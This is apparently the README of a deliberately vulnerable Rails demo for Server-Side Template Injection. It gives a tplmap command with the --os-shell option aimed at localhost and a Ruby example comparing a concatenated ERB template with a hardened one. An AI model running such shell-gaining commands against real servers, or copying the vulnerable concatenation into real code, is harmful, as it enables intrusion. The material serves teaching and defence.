# Hands-on SSTI attack on Rails app

This application is a deliberately vulnerable demonstration prototype that shows how a Server-Side Template Injection (SSTI) attack works against a Rails app.

## Run server

```sh
rails server
```

## Hack

Run the SSTI attack with tplmap:

```sh
./tplmap.py --data 'name=value1' --engine erb --os-shell -u 'http://localhost:3000'
```

In this example, the template is built by string concatenation, so the `name` parameter becomes part of the ERB template source itself and is executed rather than rendered as data 😱
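To make the concatenation bug concrete, here is an added example (not code from this repository) that puts the vulnerable ERB construction next to a hardened version. It uses plain Ruby `ERB` rather than a Rails controller, and the input string and method names are constructed for illustration: the vulnerable method splices the parameter into the template text, while the hardened method keeps the template fixed and passes the parameter in as a local variable, HTML-escaped on output.

```ruby
require 'erb'

# Constructed sample input: an ERB expression tag, as an attacker
# would place in the `name` parameter. Harmless arithmetic is enough
# to show whether input is executed or merely displayed.
SAMPLE_INPUT = "<%= 6 * 7 %>".freeze

# VULNERABLE: the untrusted value becomes part of the template source,
# so any ERB tags inside it are compiled and executed by the engine.
def render_by_concatenation(name)
  template = "Hello, " + name + "!"
  ERB.new(template).result(binding)
end

# HARDENED: the template is a fixed string written by the developer.
# User data is supplied through a local variable and escaped when
# written into the output, so it is never parsed as template code.
SAFE_TEMPLATE = "Hello, <%= ERB::Util.html_escape(name) %>!".freeze

def render_with_local(name)
  ERB.new(SAFE_TEMPLATE).result_with_hash(name: name)
end

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable: #{render_by_concatenation(SAMPLE_INPUT)}"
  puts "hardened:   #{render_with_local(SAMPLE_INPUT)}"
end
```

Running the file prints `Hello, 42!` for the vulnerable path (the tag was evaluated) and `Hello, &lt;%= 6 * 7 %&gt;!` for the hardened path (the tag survived only as escaped text). The same distinction applies in Rails views: keep templates static on disk and pass request data in as locals or instance variables; never build template strings from `params`.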